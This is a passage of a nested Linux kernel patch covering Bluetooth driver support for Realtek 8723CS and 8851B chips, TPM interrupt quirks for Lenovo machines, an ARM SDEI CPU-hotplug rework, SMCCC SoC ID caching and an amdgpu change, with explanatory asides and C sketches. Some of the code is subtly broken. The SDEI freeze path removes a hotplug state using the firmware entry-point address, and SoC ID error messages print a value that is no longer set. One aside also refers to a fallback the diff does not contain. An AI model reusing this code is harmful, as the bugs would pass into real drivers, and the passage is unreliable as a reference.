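The fallback reads the BDADDR EFI variable and byte-swaps it with baswap() before programming the controller, which implies the firmware stores the address in the opposite byte order from the kernel's bdaddr_t. A sketch of that six-byte reversal, assuming the array layout shown; the kernel's bdaddr_t and baswap() details may differ.

#include <stdio.h>

typedef struct { unsigned char b[6]; } bdaddr_t;

/* Reverse the six address bytes: Bluetooth addresses are handled
 * little-endian on the HCI side, while firmware interfaces commonly
 * store them in the printed (big-endian) order. */
static void baswap_sketch(bdaddr_t *dst, const bdaddr_t *src)
{
        int i;

        for (i = 0; i < 6; i++)
                dst->b[i] = src->b[5 - i];
}

int main(void)
{
        bdaddr_t efi = { { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 } };
        bdaddr_t hci;
        int i;

        baswap_sketch(&hci, &efi);
        for (i = 5; i >= 0; i--)
                printf("%02x%s", hci.b[i], i ? ":" : "\n");
        return 0;
}
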
+diff --git a/drivers/bluetooth/btintel.c b/drivers/bluetooth/btintel.c
+index f6b4b7a1be4cc..bbad1207cdfd8 100644
+--- a/drivers/bluetooth/btintel.c
++++ b/drivers/bluetooth/btintel.c
+@@ -2553,9 +2553,8 @@ static int btintel_setup_combined(struct hci_dev *hdev)
+ 		 */
+ 		set_bit(HCI_QUIRK_WIDEBAND_SPEECH_SUPPORTED, &hdev->quirks);
+ 
+-		/* Valid LE States quirk for GfP */
+-		if (INTEL_HW_VARIANT(ver_tlv.cnvi_bt) == 0x18)
+-			set_bit(HCI_QUIRK_VALID_LE_STATES, &hdev->quirks);
++		/* Apply LE States quirk from solar onwards */
++		set_bit(HCI_QUIRK_VALID_LE_STATES, &hdev->quirks);
+ 
+ 		/* Setup MSFT Extension support */
+ 		btintel_set_msft_opcode(hdev,
+diff --git a/drivers/bluetooth/btrtl.c b/drivers/bluetooth/btrtl.c
+index fb52313a1d45a..ead632595ce06 100644
+--- a/drivers/bluetooth/btrtl.c
++++ b/drivers/bluetooth/btrtl.c
+@@ -17,19 +17,25 @@
+ 
+ #define VERSION "0.1"
+ 
++#define RTL_CHIP_8723CS_CG	3
++#define RTL_CHIP_8723CS_VF	4
++#define RTL_CHIP_8723CS_XX	5
+ #define RTL_EPATCH_SIGNATURE	"Realtech"
++#define RTL_ROM_LMP_8703B	0x8703
+ #define RTL_ROM_LMP_8723A	0x1200
+ #define RTL_ROM_LMP_8723B	0x8723
+ #define RTL_ROM_LMP_8821A	0x8821
+ #define RTL_ROM_LMP_8761A	0x8761
+ #define RTL_ROM_LMP_8822B	0x8822
+ #define RTL_ROM_LMP_8852A	0x8852
++#define RTL_ROM_LMP_8851B	0x8851
+ #define RTL_CONFIG_MAGIC	0x8723ab55
+ 
+ #define IC_MATCH_FL_LMPSUBV	(1 << 0)
+ #define IC_MATCH_FL_HCIREV	(1 << 1)
+ #define IC_MATCH_FL_HCIVER	(1 << 2)
+ #define IC_MATCH_FL_HCIBUS	(1 << 3)
++#define IC_MATCH_FL_CHIP_TYPE	(1 << 4)
+ #define IC_INFO(lmps, hcir, hciv, bus) \
+ 	.match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_HCIREV | \
+ 		       IC_MATCH_FL_HCIVER | IC_MATCH_FL_HCIBUS, \
+@@ -51,6 +57,7 @@ enum btrtl_chip_id {
+ 	CHIP_ID_8852A = 18,
+ 	CHIP_ID_8852B = 20,
+ 	CHIP_ID_8852C = 25,
++	CHIP_ID_8851B = 36,
+ };
+ 
+ struct id_table {
+@@ -59,6 +66,7 @@ struct id_table {
+ 	__u16 hci_rev;
+ 	__u8 hci_ver;
+ 	__u8 hci_bus;
++	__u8 chip_type;
+ 	bool config_needed;
+ 	bool has_rom_version;
+ 	bool has_msft_ext;
+@@ -99,6 +107,39 @@ static const struct id_table ic_id_table[] = {
+ 	  .fw_name  = "rtl_bt/rtl8723b_fw.bin",
+ 	  .cfg_name = "rtl_bt/rtl8723b_config" },
+ 
++	/* 8723CS-CG */
++	{ .match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_CHIP_TYPE |
++			 IC_MATCH_FL_HCIBUS,
++	  .lmp_subver = RTL_ROM_LMP_8703B,
++	  .chip_type = RTL_CHIP_8723CS_CG,
++	  .hci_bus = HCI_UART,
++	  .config_needed = true,
++	  .has_rom_version = true,
++	  .fw_name  = "rtl_bt/rtl8723cs_cg_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8723cs_cg_config" },
++
++	/* 8723CS-VF */
++	{ .match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_CHIP_TYPE |
++			 IC_MATCH_FL_HCIBUS,
++	  .lmp_subver = RTL_ROM_LMP_8703B,
++	  .chip_type = RTL_CHIP_8723CS_VF,
++	  .hci_bus = HCI_UART,
++	  .config_needed = true,
++	  .has_rom_version = true,
++	  .fw_name  = "rtl_bt/rtl8723cs_vf_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8723cs_vf_config" },
++
++	/* 8723CS-XX */
++	{ .match_flags = IC_MATCH_FL_LMPSUBV | IC_MATCH_FL_CHIP_TYPE |
++			 IC_MATCH_FL_HCIBUS,
++	  .lmp_subver = RTL_ROM_LMP_8703B,
++	  .chip_type = RTL_CHIP_8723CS_XX,
++	  .hci_bus = HCI_UART,
++	  .config_needed = true,
++	  .has_rom_version = true,
++	  .fw_name  = "rtl_bt/rtl8723cs_xx_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8723cs_xx_config" },
++
+ 	/* 8723D */
+ 	{ IC_INFO(RTL_ROM_LMP_8723B, 0xd, 0x8, HCI_USB),
+ 	  .config_needed = true,
+@@ -205,10 +246,19 @@ static const struct id_table ic_id_table[] = {
+ 	  .has_msft_ext = true,
+ 	  .fw_name  = "rtl_bt/rtl8852cu_fw.bin",
+ 	  .cfg_name = "rtl_bt/rtl8852cu_config" },
++
++	/* 8851B */
++	{ IC_INFO(RTL_ROM_LMP_8851B, 0xb, 0xc, HCI_USB),
++	  .config_needed = false,
++	  .has_rom_version = true,
++	  .has_msft_ext = false,
++	  .fw_name  = "rtl_bt/rtl8851bu_fw.bin",
++	  .cfg_name = "rtl_bt/rtl8851bu_config" },
+ 	};
+ 
+ static const struct id_table *btrtl_match_ic(u16 lmp_subver, u16 hci_rev,
+-					     u8 hci_ver, u8 hci_bus)
++					     u8 hci_ver, u8 hci_bus,
++					     u8 chip_type)
+ {
+ 	int i;
+ 
+@@ -225,6 +275,9 @@ static const struct id_table *btrtl_match_ic(u16 lmp_subver, u16 hci_rev,
+ 		if ((ic_id_table[i].match_flags & IC_MATCH_FL_HCIBUS) &&
+ 		    (ic_id_table[i].hci_bus != hci_bus))
+ 			continue;
++		if ((ic_id_table[i].match_flags & IC_MATCH_FL_CHIP_TYPE) &&
++		    (ic_id_table[i].chip_type != chip_type))
++			continue;
+ 
+ 		break;
+ 	}
+@@ -307,6 +360,7 @@ static int rtlbt_parse_firmware(struct hci_dev *hdev,
+ 		{ RTL_ROM_LMP_8723B, 1 },
+ 		{ RTL_ROM_LMP_8821A, 2 },
+ 		{ RTL_ROM_LMP_8761A, 3 },
++		{ RTL_ROM_LMP_8703B, 7 },
+ 		{ RTL_ROM_LMP_8822B, 8 },
+ 		{ RTL_ROM_LMP_8723B, 9 },	/* 8723D */
+ 		{ RTL_ROM_LMP_8821A, 10 },	/* 8821C */
+@@ -315,6 +369,7 @@ static int rtlbt_parse_firmware(struct hci_dev *hdev,
+ 		{ RTL_ROM_LMP_8852A, 18 },	/* 8852A */
+ 		{ RTL_ROM_LMP_8852A, 20 },	/* 8852B */
+ 		{ RTL_ROM_LMP_8852A, 25 },	/* 8852C */
++		{ RTL_ROM_LMP_8851B, 36 },	/* 8851B */
+ 	};
+ 
+ 	min_size = sizeof(struct rtl_epatch_header) + sizeof(extension_sig) + 3;
+@@ -587,6 +642,48 @@ out:
+ 	return ret;
+ }
+ 
++static bool rtl_has_chip_type(u16 lmp_subver)
++{
++	switch (lmp_subver) {
++	case RTL_ROM_LMP_8703B:
++		return true;
++	default:
++		break;
++	}
++
++	return  false;
++}
++
++static int rtl_read_chip_type(struct hci_dev *hdev, u8 *type)
++{
++	struct rtl_chip_type_evt *chip_type;
++	struct sk_buff *skb;
++	const unsigned char cmd_buf[] = {0x00, 0x94, 0xa0, 0x00, 0xb0};
++
++	/* Read RTL chip type command */
++	skb = __hci_cmd_sync(hdev, 0xfc61, 5, cmd_buf, HCI_INIT_TIMEOUT);
++	if (IS_ERR(skb)) {
++		rtl_dev_err(hdev, "Read chip type failed (%ld)",
++			    PTR_ERR(skb));
++		return PTR_ERR(skb);
++	}
++
++	chip_type = skb_pull_data(skb, sizeof(*chip_type));
++	if (!chip_type) {
++		rtl_dev_err(hdev, "RTL chip type event length mismatch");
++		kfree_skb(skb);
++		return -EIO;
++	}
++
++	rtl_dev_info(hdev, "chip_type status=%x type=%x",
++		     chip_type->status, chip_type->type);
++
++	*type = chip_type->type & 0x0f;
++
++	kfree_skb(skb);
++	return 0;
++}
++
+ void btrtl_free(struct btrtl_device_info *btrtl_dev)
+ {
+ 	kvfree(btrtl_dev->fw_data);
+@@ -603,7 +700,7 @@ struct btrtl_device_info *btrtl_initialize(struct hci_dev *hdev,
+ 	struct hci_rp_read_local_version *resp;
+ 	char cfg_name[40];
+ 	u16 hci_rev, lmp_subver;
+-	u8 hci_ver;
++	u8 hci_ver, chip_type = 0;
+ 	int ret;
+ 	u16 opcode;
+ 	u8 cmd[2];
+@@ -629,8 +726,14 @@ struct btrtl_device_info *btrtl_initialize(struct hci_dev *hdev,
+ 	hci_rev = le16_to_cpu(resp->hci_rev);
+ 	lmp_subver = le16_to_cpu(resp->lmp_subver);
+ 
++	if (rtl_has_chip_type(lmp_subver)) {
++		ret = rtl_read_chip_type(hdev, &chip_type);
++		if (ret)
++			goto err_free;
++	}
++
+ 	btrtl_dev->ic_info = btrtl_match_ic(lmp_subver, hci_rev, hci_ver,
+-					    hdev->bus);
++					    hdev->bus, chip_type);
+ 
+ 	if (!btrtl_dev->ic_info)
+ 		btrtl_dev->drop_fw = true;
+@@ -673,7 +776,7 @@ struct btrtl_device_info *btrtl_initialize(struct hci_dev *hdev,
+ 		lmp_subver = le16_to_cpu(resp->lmp_subver);
+ 
+ 		btrtl_dev->ic_info = btrtl_match_ic(lmp_subver, hci_rev, hci_ver,
+-						    hdev->bus);
++						    hdev->bus, chip_type);
+ 	}
+ out_free:
+ 	kfree_skb(skb);
+@@ -755,6 +858,8 @@ int btrtl_download_firmware(struct hci_dev *hdev,
+ 	case RTL_ROM_LMP_8761A:
+ 	case RTL_ROM_LMP_8822B:
+ 	case RTL_ROM_LMP_8852A:
++	case RTL_ROM_LMP_8703B:
++	case RTL_ROM_LMP_8851B:
+ 		return btrtl_setup_rtl8723b(hdev, btrtl_dev);
+ 	default:
+ 		rtl_dev_info(hdev, "assuming no firmware upload needed");
+@@ -779,6 +884,7 @@ void btrtl_set_quirks(struct hci_dev *hdev, struct btrtl_device_info *btrtl_dev)
+ 	case CHIP_ID_8852A:
+ 	case CHIP_ID_8852B:
+ 	case CHIP_ID_8852C:
++	case CHIP_ID_8851B:
+ 		set_bit(HCI_QUIRK_VALID_LE_STATES, &hdev->quirks);
+ 		set_bit(HCI_QUIRK_WIDEBAND_SPEECH_SUPPORTED, &hdev->quirks);
+ 		hci_set_aosp_capable(hdev);
+@@ -788,6 +894,22 @@ void btrtl_set_quirks(struct hci_dev *hdev, struct btrtl_device_info *btrtl_dev)
+ 		rtl_dev_dbg(hdev, "WBS supported not enabled.");
+ 		break;
+ 	}
++
++	if (!btrtl_dev->ic_info)
++		return;
++
++	switch (btrtl_dev->ic_info->lmp_subver) {
++	case RTL_ROM_LMP_8703B:
++		/* 8723CS reports two pages for local ext features,
++		 * but it doesn't support any features from page 2 -
++		 * it either responds with garbage or with error status
++		 */
++		set_bit(HCI_QUIRK_BROKEN_LOCAL_EXT_FEATURES_PAGE_2,
++			&hdev->quirks);
++		break;
++	default:
++		break;
++	}
+ }
+ EXPORT_SYMBOL_GPL(btrtl_set_quirks);
+ 
+@@ -946,6 +1068,12 @@ MODULE_FIRMWARE("rtl_bt/rtl8723b_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723b_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723bs_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723bs_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_cg_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_cg_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_vf_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8723cs_xx_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8723ds_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8761a_fw.bin");
+@@ -960,3 +1088,5 @@ MODULE_FIRMWARE("rtl_bt/rtl8852bu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852bu_config.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_fw.bin");
+ MODULE_FIRMWARE("rtl_bt/rtl8852cu_config.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_fw.bin");
++MODULE_FIRMWARE("rtl_bt/rtl8851bu_config.bin");
+diff --git a/drivers/bluetooth/btrtl.h b/drivers/bluetooth/btrtl.h
+index 2c441bda390a0..1c6282241d2d2 100644
+--- a/drivers/bluetooth/btrtl.h
++++ b/drivers/bluetooth/btrtl.h
+@@ -14,6 +14,11 @@
+ 
+ struct btrtl_device_info;
+ 
++struct rtl_chip_type_evt {
++	__u8 status;
++	__u8 type;
++} __packed;
++
+ struct rtl_download_cmd {
+ 	__u8 index;
+ 	__u8 data[RTL_FRAG_LEN];
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 90b85dcb138df..faad19b396d50 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -549,6 +549,9 @@ static const struct usb_device_id blacklist_table[] = {
+ 	{ USB_DEVICE(0x043e, 0x310c), .driver_info = BTUSB_MEDIATEK |
+ 						     BTUSB_WIDEBAND_SPEECH |
+ 						     BTUSB_VALID_LE_STATES },
++	{ USB_DEVICE(0x04ca, 0x3801), .driver_info = BTUSB_MEDIATEK |
++						     BTUSB_WIDEBAND_SPEECH |
++						     BTUSB_VALID_LE_STATES },
+ 
+ 	/* Additional MediaTek MT7668 Bluetooth devices */
+ 	{ USB_DEVICE(0x043e, 0x3109), .driver_info = BTUSB_MEDIATEK |
+@@ -4016,6 +4019,9 @@ static int btusb_probe(struct usb_interface *intf,
+ 	if (id->driver_info & BTUSB_ACTIONS_SEMI) {
+ 		/* Support is advertised, but not implemented */
+ 		set_bit(HCI_QUIRK_BROKEN_ERR_DATA_REPORTING, &hdev->quirks);
++		set_bit(HCI_QUIRK_BROKEN_READ_TRANSMIT_POWER, &hdev->quirks);
++		set_bit(HCI_QUIRK_BROKEN_SET_RPA_TIMEOUT, &hdev->quirks);
++		set_bit(HCI_QUIRK_BROKEN_EXT_SCAN, &hdev->quirks);
+ 	}
+ 
+ 	if (!reset)
+diff --git a/drivers/bluetooth/hci_h5.c b/drivers/bluetooth/hci_h5.c
+index 6455bc4fb5bb3..e90670955df2c 100644
+--- a/drivers/bluetooth/hci_h5.c
++++ b/drivers/bluetooth/hci_h5.c
+@@ -936,6 +936,8 @@ static int h5_btrtl_setup(struct h5 *h5)
+ 	err = btrtl_download_firmware(h5->hu->hdev, btrtl_dev);
+ 	/* Give the device some time before the hci-core sends it a reset */
+ 	usleep_range(10000, 20000);
++	if (err)
++		goto out_free;
+ 
+ 	btrtl_set_quirks(h5->hu->hdev, btrtl_dev);
+ 
+@@ -1100,6 +1102,8 @@ static const struct of_device_id rtl_bluetooth_of_match[] = {
+ 	  .data = (const void *)&h5_data_rtl8822cs },
+ 	{ .compatible = "realtek,rtl8723bs-bt",
+ 	  .data = (const void *)&h5_data_rtl8723bs },
++	{ .compatible = "realtek,rtl8723cs-bt",
++	  .data = (const void *)&h5_data_rtl8723bs },
+ 	{ .compatible = "realtek,rtl8723ds-bt",
+ 	  .data = (const void *)&h5_data_rtl8723bs },
+ #endif
+diff --git a/drivers/char/tpm/tpm_tis.c b/drivers/char/tpm/tpm_tis.c
+index ed5dabd3c72d6..4be19d8f3ca95 100644
+--- a/drivers/char/tpm/tpm_tis.c
++++ b/drivers/char/tpm/tpm_tis.c
+@@ -83,6 +83,22 @@ static const struct dmi_system_id tpm_tis_dmi_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad T490s"),
+ 		},
+ 	},
++	{
++		.callback = tpm_tis_disable_irq,
++		.ident = "ThinkStation P360 Tiny",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkStation P360 Tiny"),
++		},
++	},
++	{
++		.callback = tpm_tis_disable_irq,
++		.ident = "ThinkPad L490",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "ThinkPad L490"),
++		},
++	},
+ 	{}
+ };
+ 
+diff --git a/drivers/firmware/arm_sdei.c b/drivers/firmware/arm_sdei.c
+index 1e1a51510e83b..f9040bd610812 100644
+--- a/drivers/firmware/arm_sdei.c
++++ b/drivers/firmware/arm_sdei.c
+@@ -43,6 +43,8 @@ static asmlinkage void (*sdei_firmware_call)(unsigned long function_id,
+ /* entry point from firmware to arch asm code */
+ static unsigned long sdei_entry_point;
+ 
++static int sdei_hp_state;
++
+ struct sdei_event {
+ 	/* These three are protected by the sdei_list_lock */
+ 	struct list_head	list;
+@@ -301,8 +303,6 @@ int sdei_mask_local_cpu(void)
+ {
+ 	int err;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = invoke_sdei_fn(SDEI_1_0_FN_SDEI_PE_MASK, 0, 0, 0, 0, 0, NULL);
+ 	if (err && err != -EIO) {
+ 		pr_warn_once("failed to mask CPU[%u]: %d\n",
+@@ -315,6 +315,7 @@ int sdei_mask_local_cpu(void)
+ 
+ static void _ipi_mask_cpu(void *ignored)
+ {
++	WARN_ON_ONCE(preemptible());
+ 	sdei_mask_local_cpu();
+ }
+ 
+@@ -322,8 +323,6 @@ int sdei_unmask_local_cpu(void)
+ {
+ 	int err;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = invoke_sdei_fn(SDEI_1_0_FN_SDEI_PE_UNMASK, 0, 0, 0, 0, 0, NULL);
+ 	if (err && err != -EIO) {
+ 		pr_warn_once("failed to unmask CPU[%u]: %d\n",
+@@ -336,6 +335,7 @@ int sdei_unmask_local_cpu(void)
+ 
+ static void _ipi_unmask_cpu(void *ignored)
+ {
++	WARN_ON_ONCE(preemptible());
+ 	sdei_unmask_local_cpu();
+ }
+ 
+@@ -343,6 +343,8 @@ static void _ipi_private_reset(void *ignored)
+ {
+ 	int err;
+ 
++	WARN_ON_ONCE(preemptible());
++
+ 	err = invoke_sdei_fn(SDEI_1_0_FN_SDEI_PRIVATE_RESET, 0, 0, 0, 0, 0,
+ 			     NULL);
+ 	if (err && err != -EIO)
+@@ -389,8 +391,6 @@ static void _local_event_enable(void *data)
+ 	int err;
+ 	struct sdei_crosscall_args *arg = data;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = sdei_api_event_enable(arg->event->event_num);
+ 
+ 	sdei_cross_call_return(arg, err);
+@@ -479,8 +479,6 @@ static void _local_event_unregister(void *data)
+ 	int err;
+ 	struct sdei_crosscall_args *arg = data;
+ 
+-	WARN_ON_ONCE(preemptible());
+-
+ 	err = sdei_api_event_unregister(arg->event->event_num);
+ 
+ 	sdei_cross_call_return(arg, err);
+@@ -561,8 +559,6 @@ static void _local_event_register(void *data)
+ 	struct sdei_registered_event *reg;
+ 	struct sdei_crosscall_args *arg = data;
+ 
+-	WARN_ON(preemptible());
+-
+ 	reg = per_cpu_ptr(arg->event->private_registered, smp_processor_id());
+ 	err = sdei_api_event_register(arg->event->event_num, sdei_entry_point,
+ 				      reg, 0, 0);
+@@ -717,6 +713,8 @@ static int sdei_pm_notifier(struct notifier_block *nb, unsigned long action,
+ {
+ 	int rv;
+ 
++	WARN_ON_ONCE(preemptible());
++
+ 	switch (action) {
+ 	case CPU_PM_ENTER:
+ 		rv = sdei_mask_local_cpu();
+@@ -765,7 +763,7 @@ static int sdei_device_freeze(struct device *dev)
+ 	int err;
+ 
+ 	/* unregister private events */
+-	cpuhp_remove_state(CPUHP_AP_ARM_SDEI_STARTING);
++	cpuhp_remove_state(sdei_entry_point);
+ 
+ 	err = sdei_unregister_shared();
+ 	if (err)
+@@ -786,12 +784,15 @@ static int sdei_device_thaw(struct device *dev)
+ 		return err;
+ 	}
+ 
+-	err = cpuhp_setup_state(CPUHP_AP_ARM_SDEI_STARTING, "SDEI",
++	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "SDEI",
+ 				&sdei_cpuhp_up, &sdei_cpuhp_down);
+-	if (err)
++	if (err < 0) {
+ 		pr_warn("Failed to re-register CPU hotplug notifier...\n");
++		return err;
++	}
+ 
+-	return err;
++	sdei_hp_state = err;
++	return 0;
+ }
+ 
+ static int sdei_device_restore(struct device *dev)
+@@ -823,7 +824,7 @@ static int sdei_reboot_notifier(struct notifier_block *nb, unsigned long action,
+ 	 * We are going to reset the interface, after this there is no point
+ 	 * doing work when we take CPUs offline.
+ 	 */
+-	cpuhp_remove_state(CPUHP_AP_ARM_SDEI_STARTING);
++	cpuhp_remove_state(sdei_hp_state);
+ 
+ 	sdei_platform_reset();
+ 
+@@ -1003,13 +1004,15 @@ static int sdei_probe(struct platform_device *pdev)
+ 		goto remove_cpupm;
+ 	}
+ 
+-	err = cpuhp_setup_state(CPUHP_AP_ARM_SDEI_STARTING, "SDEI",
++	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "SDEI",
+ 				&sdei_cpuhp_up, &sdei_cpuhp_down);
+-	if (err) {
++	if (err < 0) {
+ 		pr_warn("Failed to register CPU hotplug notifier...\n");
+ 		goto remove_reboot;
+ 	}
+ 
++	sdei_hp_state = err;
++
+ 	return 0;
+ 
+ remove_reboot:
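
With the move from the fixed CPUHP_AP_ARM_SDEI_STARTING slot to CPUHP_AP_ONLINE_DYN, cpuhp_setup_state() no longer returns 0 on success but the dynamically allocated state number, which must be stashed (sdei_hp_state above) and passed back to cpuhp_remove_state(). A kernel-style sketch of the pattern, not buildable on its own; the my_* names are placeholders.

/* Kernel-context sketch only; module boilerplate omitted. */
#include <linux/cpuhotplug.h>
#include <linux/init.h>

static int my_hp_state;

static int my_cpu_up(unsigned int cpu)   { return 0; }
static int my_cpu_down(unsigned int cpu) { return 0; }

static int __init my_driver_init(void)
{
        int ret;

        ret = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "my_driver:online",
                                my_cpu_up, my_cpu_down);
        if (ret < 0)            /* with _DYN, success is >= 0 */
                return ret;

        my_hp_state = ret;      /* keep: needed for teardown later */
        return 0;
}

static void my_driver_exit(void)
{
        cpuhp_remove_state(my_hp_state);
}
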
+diff --git a/drivers/firmware/smccc/smccc.c b/drivers/firmware/smccc/smccc.c
+index 60ccf3e90d7de..db818f9dcb8ee 100644
+--- a/drivers/firmware/smccc/smccc.c
++++ b/drivers/firmware/smccc/smccc.c
+@@ -17,9 +17,13 @@ static enum arm_smccc_conduit smccc_conduit = SMCCC_CONDUIT_NONE;
+ 
+ bool __ro_after_init smccc_trng_available = false;
+ u64 __ro_after_init smccc_has_sve_hint = false;
++s32 __ro_after_init smccc_soc_id_version = SMCCC_RET_NOT_SUPPORTED;
++s32 __ro_after_init smccc_soc_id_revision = SMCCC_RET_NOT_SUPPORTED;
+ 
+ void __init arm_smccc_version_init(u32 version, enum arm_smccc_conduit conduit)
+ {
++	struct arm_smccc_res res;
++
+ 	smccc_version = version;
+ 	smccc_conduit = conduit;
+ 
+@@ -27,6 +31,18 @@ void __init arm_smccc_version_init(u32 version, enum arm_smccc_conduit conduit)
+ 	if (IS_ENABLED(CONFIG_ARM64_SVE) &&
+ 	    smccc_version >= ARM_SMCCC_VERSION_1_3)
+ 		smccc_has_sve_hint = true;
++
++	if ((smccc_version >= ARM_SMCCC_VERSION_1_2) &&
++	    (smccc_conduit != SMCCC_CONDUIT_NONE)) {
++		arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_FEATURES_FUNC_ID,
++				     ARM_SMCCC_ARCH_SOC_ID, &res);
++		if ((s32)res.a0 >= 0) {
++			arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 0, &res);
++			smccc_soc_id_version = (s32)res.a0;
++			arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 1, &res);
++			smccc_soc_id_revision = (s32)res.a0;
++		}
++	}
+ }
+ 
+ enum arm_smccc_conduit arm_smccc_1_1_get_conduit(void)
+@@ -44,6 +60,16 @@ u32 arm_smccc_get_version(void)
+ }
+ EXPORT_SYMBOL_GPL(arm_smccc_get_version);
+ 
++s32 arm_smccc_get_soc_id_version(void)
++{
++	return smccc_soc_id_version;
++}
++
++s32 arm_smccc_get_soc_id_revision(void)
++{
++	return smccc_soc_id_revision;
++}
++
+ static int __init smccc_devices_init(void)
+ {
+ 	struct platform_device *pdev;
+diff --git a/drivers/firmware/smccc/soc_id.c b/drivers/firmware/smccc/soc_id.c
+index dd7c3d5e8b0bb..890eb454599a3 100644
+--- a/drivers/firmware/smccc/soc_id.c
++++ b/drivers/firmware/smccc/soc_id.c
+@@ -42,41 +42,23 @@ static int __init smccc_soc_init(void)
+ 	if (arm_smccc_get_version() < ARM_SMCCC_VERSION_1_2)
+ 		return 0;
+ 
+-	if (arm_smccc_1_1_get_conduit() == SMCCC_CONDUIT_NONE) {
+-		pr_err("%s: invalid SMCCC conduit\n", __func__);
+-		return -EOPNOTSUPP;
+-	}
+-
+-	arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_FEATURES_FUNC_ID,
+-			     ARM_SMCCC_ARCH_SOC_ID, &res);
+-
+-	if ((int)res.a0 == SMCCC_RET_NOT_SUPPORTED) {
++	soc_id_version = arm_smccc_get_soc_id_version();
++	if (soc_id_version == SMCCC_RET_NOT_SUPPORTED) {
+ 		pr_info("ARCH_SOC_ID not implemented, skipping ....\n");
+ 		return 0;
+ 	}
+ 
+-	if ((int)res.a0 < 0) {
+-		pr_info("ARCH_FEATURES(ARCH_SOC_ID) returned error: %lx\n",
+-			res.a0);
+-		return -EINVAL;
+-	}
+-
+-	arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 0, &res);
+-	if ((int)res.a0 < 0) {
++	if (soc_id_version < 0) {
+ 		pr_err("ARCH_SOC_ID(0) returned error: %lx\n", res.a0);
+ 		return -EINVAL;
+ 	}
+ 
+-	soc_id_version = res.a0;
+-
+-	arm_smccc_1_1_invoke(ARM_SMCCC_ARCH_SOC_ID, 1, &res);
+-	if ((int)res.a0 < 0) {
++	soc_id_rev = arm_smccc_get_soc_id_revision();
++	if (soc_id_rev < 0) {
+ 		pr_err("ARCH_SOC_ID(1) returned error: %lx\n", res.a0);
+ 		return -EINVAL;
+ 	}
+ 
+-	soc_id_rev = res.a0;
+-
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+ 	if (!soc_dev_attr)
+ 		return -ENOMEM;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index 3380daf42da8a..b803e785d3aff 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -683,9 +683,11 @@ int amdgpu_gfx_ras_late_init(struct amdgpu_device *adev, struct ras_common_if *r
+ 		if (r)
+ 			return r;
+ 
+-		r = amdgpu_irq_get(adev, &adev->gfx.cp_ecc_error_irq, 0);
+-		if (r)
+-			goto late_fini;
++		if (adev->gfx.cp_ecc_error_irq.funcs) {
++			r = amdgpu_irq_get(adev, &adev->gfx.cp_ecc_error_irq, 0);
++			if (r)
++				goto late_fini;
++		}
+ 	} else {
+ 		amdgpu_ras_feature_enable_on_boot(adev, ras_block, 0);
+ 	}
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+index 82e27bd4f0383..7e8b7171068dc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_mes.c
+@@ -1432,13 +1432,31 @@ int amdgpu_mes_init_microcode(struct amdgpu_device *adev, int pipe)
+ 	struct amdgpu_firmware_info *info;
+ 	char ucode_prefix[30];
+ 	char fw_name[40];
++	bool need_retry = false;
+ 	int r;
+ 
+-	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix, sizeof(ucode_prefix));
+-	snprintf(fw_name, sizeof(fw_name), "amdgpu/%s_mes%s.bin",
+-		ucode_prefix,
+-		pipe == AMDGPU_MES_SCHED_PIPE ? "" : "1");
++	amdgpu_ucode_ip_version_decode(adev, GC_HWIP, ucode_prefix,
++				       sizeof(ucode_prefix));
++	if (adev->ip_versions[GC_HWIP][0] >= IP_VERSION(11, 0, 0)) {
